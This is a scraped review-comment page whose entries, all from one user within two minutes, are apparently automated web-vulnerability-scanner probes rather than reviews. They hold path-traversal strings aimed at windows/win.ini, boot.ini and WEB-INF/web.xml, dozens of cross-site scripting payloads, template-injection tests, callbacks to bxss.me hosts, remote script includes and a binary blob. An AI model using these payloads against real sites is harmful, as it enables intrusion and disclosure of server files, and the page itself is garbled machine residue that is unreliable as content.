\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF/web.xml
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
1some_inexistent_file_with_long_name.
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF\web.xml
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
12345'"\'\");|]*{ <>�''💩
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Http://testasp.vulnweb.com/t/fit.txt
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/fit.txt?.
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
testasp.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../boot.ini
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini.jpg
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
1some_inexistent_file_with_long_name.
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Http://testasp.vulnweb.com/t/fit.txt
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
12345'"\'\");|]*{ <>�''💩
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
������������������������������������������������windows��win.ini
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/fit.txt?.
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
................windowswin.ini
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
testasp.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
..\..\..\..\..\..\..\..\windows\win.ini
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
1&n902299=v970820
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/xss.html?%00.jpg
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.&n995502=v960229
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/xss.html?%00.jpg
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/xss.html?%00.jpg
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
12345'"\'\");|]*{ <>�''💩
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
474
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
474
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF/web.xml
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
474/.
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
http://hite8NytKB4c2.bxss.me/
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF\web.xml
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
474
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
http://hityBegAajHTd.bxss.me/
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
474
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
474/.
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
http://hitiTPEUpcRpT.bxss.me/
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
474
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
http://hitf03By5HzJ7.bxss.me/
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../boot.ini
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
474
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
http://hitrAe4p9rKXM.bxss.me/
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini.
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
/www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
474/.
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
http://hitWMjaOOYb85.bxss.me/
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
977829
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
������������������������������������������������windows��win.ini
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
474
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
http://www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
474
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
................windowswin.ini
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
1'"()&%<acx><ScRiPt >prompt(924420)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
474/.
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
'"()&%<acx><ScRiPt >prompt(950592)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
..\..\..\..\..\..\..\..\windows\win.ini
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
474
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
//www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
1_921392
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
474
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
474/.
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
474
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
474
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
/\www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
474/.
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
acu2933<s1﹥s2ʺs3ʹuca2933
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
WEB-INF/web.xml
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
/www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
acux2390��z1��z2a�bcxuca2390
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
919510
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
WEB-INF\web.xml
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
http://www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0  
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
{{9999045*10000284}}
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../boot.ini
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
//www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt >prompt(926282)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini.
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
1<script>prompt(989709)</script>
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScR<ScRiPt>IpT>prompt(933816)</sCr<ScRiPt>IpT>
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
������������������������������������������������windows��win.ini
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(932022)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
/\www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
................windowswin.ini
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?943382></ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(929389)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
..\..\..\..\..\..\..\..\windows\win.ini
1
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
1<video><source onerror="javascript:prompt(932102)">
From: yebglfyh | Date: 4/15/2016 10:15 PM
Was this review helpful? Yes No (0/0)
Mr.
/www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1<svg  

�onload=prompt(984606);>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
998715
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1%3Csvg%20onload%3Dprompt(937188)%3E
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
http://www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1<isindex type=image src=1 onerror=prompt(955183)>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1<div style=width:expression(prompt(989070))>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='902601'>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1<body onload=prompt(966214)>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
//www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
WEB-INF/web.xml
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(912190)>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
WEB-INF\web.xml
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=xyz OnErRor=prompt(982433)>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img/src=">" onerror=alert(935732)>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
/\www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt%20>prompt(993015)</sCripT>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../boot.ini
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1\u003CScRiPt\u003Eprompt(927287)\u003C/sCripT\u003E
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1&lt;ScRiPt&gt;prompt(997519)&lt;/sCripT&gt;
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini.
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
�<img acu onmouseover=prompt(983860) //�>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
